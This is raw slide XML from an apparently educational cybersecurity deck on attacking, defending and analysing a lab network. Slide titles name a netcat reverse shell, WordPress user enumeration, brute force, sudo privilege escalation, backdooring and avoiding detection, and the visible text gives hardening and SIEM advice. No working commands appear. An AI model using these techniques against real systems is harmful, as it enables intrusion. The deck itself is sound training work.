          <p:cNvPr id="699" name="Google Shape;699;p8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69</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p8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701" name="Google Shape;701;p8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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p86"/>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sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress is insecure by default.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5962375"/>
            <a:ext cx="242469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sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Securi Plugin can easily be installed and configured even by the non-developer user. </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="8236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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Editing user permission and configuration files can be implemented by a technically savvy user or by a contractor.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4118600" y="10510825"/>
            <a:ext cx="19527600" cy="164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4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Maintaining a SIEM with appropriate alerts and thresholds is necessary to monitor all malicious traffic.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8" name="Google Shape;158;p2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159" name="Google Shape;159;p24"/>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1: Offensive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60" name="Google Shape;160;p24"/>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11" name="Google Shape;711;p8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70</a:t>
            </a:fld>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 Offensive Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;16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168" name="Google Shape;168;p2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69" name="Google Shape;169;p2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170" name="Google Shape;170;p25"/>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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p25"/>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Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p25"/>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Maintaining Access</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p25"/>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9" name="Google Shape;179;p2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9</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p2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81" name="Google Shape;181;p2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3487</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>572</Paragraphs>
  <Slides>70</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Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Final Engagement Attack, Defense &amp; Analysis of a Vulnerable Network By The Cyber Defenders  Alison Meehan</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Network Topology &amp; Critical Vulnerabilities  </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 1</vt:lpstr>
      <vt:lpstr>Critical Vulnerabilities: Target 2</vt:lpstr>
      <vt:lpstr>Part 1: Offensive Analysis </vt:lpstr>
      <vt:lpstr>Part I: Offensive Analysis</vt:lpstr>
      <vt:lpstr>Exploits Used </vt:lpstr>
      <vt:lpstr>Exploitation: V1 “Open access to SSH 22”</vt:lpstr>
      <vt:lpstr>Exploitation: V2 “Enumerate usernames in WordPress”</vt:lpstr>
      <vt:lpstr>Exploitation: V2 “Enumerate usernames in WordPress”</vt:lpstr>
      <vt:lpstr>Exploitation: V3 “User ID Susceptible to Brute Force Attacks (CWE-307)”</vt:lpstr>
      <vt:lpstr>Exploitation: V3 “User ID Susceptible to Brute Force Attacks (CWE-307)”</vt:lpstr>
      <vt:lpstr>Exploitation: V4 “Root Password of the Database in the Config File”</vt:lpstr>
      <vt:lpstr>Exploitation: “V5 Privilege Escalation via Sudo Python”</vt:lpstr>
      <vt:lpstr>Exploitation: “V5 Privilege Escalation via Sudo Python”</vt:lpstr>
      <vt:lpstr>Exploitation: “V5 Privilege Escalation via Sudo Python”</vt:lpstr>
      <vt:lpstr>Target 2 </vt:lpstr>
      <vt:lpstr>Exploitation: “V1 Brute-forceable URL directories and files”</vt:lpstr>
      <vt:lpstr>Exploitation: “V2 Netcat reverse shell/remote execution vulnerability”</vt:lpstr>
      <vt:lpstr>Exploitation: “V3 Unrestricted access to WordPress directories”</vt:lpstr>
      <vt:lpstr>Backdooring Target 2</vt:lpstr>
      <vt:lpstr>Avoiding Detection </vt:lpstr>
      <vt:lpstr>Stealth Exploitation of Target 1</vt:lpstr>
      <vt:lpstr>Maintaining Access </vt:lpstr>
      <vt:lpstr>Backdooring Target 2 </vt:lpstr>
      <vt:lpstr>Part II: Defensive Analysis </vt:lpstr>
      <vt:lpstr>Part II: Defensive Analysis</vt:lpstr>
      <vt:lpstr>Alerts Implemented  </vt:lpstr>
      <vt:lpstr>Excessive HTTP Errors</vt:lpstr>
      <vt:lpstr>HTTP Request Size Monitor</vt:lpstr>
      <vt:lpstr>CPU Usage Monitor</vt:lpstr>
      <vt:lpstr>Hardening  </vt:lpstr>
      <vt:lpstr>Hardening Against V1: Port Scanning &amp; open SSH on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against V2: Brute-Force attack on Target 1 </vt:lpstr>
      <vt:lpstr>Hardening Against V3 “Enumerate usernames in WordPress” on Target 1</vt:lpstr>
      <vt:lpstr>Hardening Against V4: Access to “wp-config.php” file</vt:lpstr>
      <vt:lpstr>Hardening Against V5: Privilege Escalation in Sudo</vt:lpstr>
      <vt:lpstr>Hardening Against nmap and netcat on Target 2</vt:lpstr>
      <vt:lpstr>Hardening Against url code injection on Target 2</vt:lpstr>
      <vt:lpstr>Implementing Patches  </vt:lpstr>
      <vt:lpstr>Implementing Patches - The Best Way (for WordPress)</vt:lpstr>
      <vt:lpstr>Implementing Patches - The Best Way (for WordPress)</vt:lpstr>
      <vt:lpstr>Implementing Patches - The Best Way (for WordPress)</vt:lpstr>
      <vt:lpstr>Implementing Patches - The “Other” Way</vt:lpstr>
      <vt:lpstr>Implementing Patches - The “Other” Way</vt:lpstr>
      <vt:lpstr>Implementing Patches - The “Other” Way</vt:lpstr>
      <vt:lpstr>Implementing Patches - The “Other” Way</vt:lpstr>
      <vt:lpstr>Part III: Network Analysis </vt:lpstr>
      <vt:lpstr>Part III: Network Analysis </vt:lpstr>
      <vt:lpstr>Traffic Profile   </vt:lpstr>
      <vt:lpstr>Traffic Profile</vt:lpstr>
      <vt:lpstr>Behavioral Analysis</vt:lpstr>
      <vt:lpstr>Normal Activity   </vt:lpstr>
      <vt:lpstr>Web Browsing</vt:lpstr>
      <vt:lpstr>Watching Youtube</vt:lpstr>
      <vt:lpstr>Shopping online</vt:lpstr>
      <vt:lpstr>Installing desktop wallpapers</vt:lpstr>
      <vt:lpstr>DHCP Request</vt:lpstr>
      <vt:lpstr>Downloading files</vt:lpstr>
      <vt:lpstr>Torrent Application Download -Interesting File</vt:lpstr>
      <vt:lpstr>HTTP Post Request Method - Interesting Traffic</vt:lpstr>
      <vt:lpstr>Malicious Activity   </vt:lpstr>
      <vt:lpstr>Torrent Download of Copyrighted Material</vt:lpstr>
      <vt:lpstr>Torrent Download of Copyrighted Material</vt:lpstr>
      <vt:lpstr>Malware Download</vt:lpstr>
      <vt:lpstr>Malware Download -Trojan</vt:lpstr>
      <vt:lpstr>Closing Remarks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 By The Cyber Defenders  David Mahanes, Alison Meehan,  Tony Null, and Saad Yaldram </dc:title>
  <cp:lastModifiedBy>Alison Meehan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-14T18:36:15Z</dcterms:modified>
</cp:coreProperties>
</file>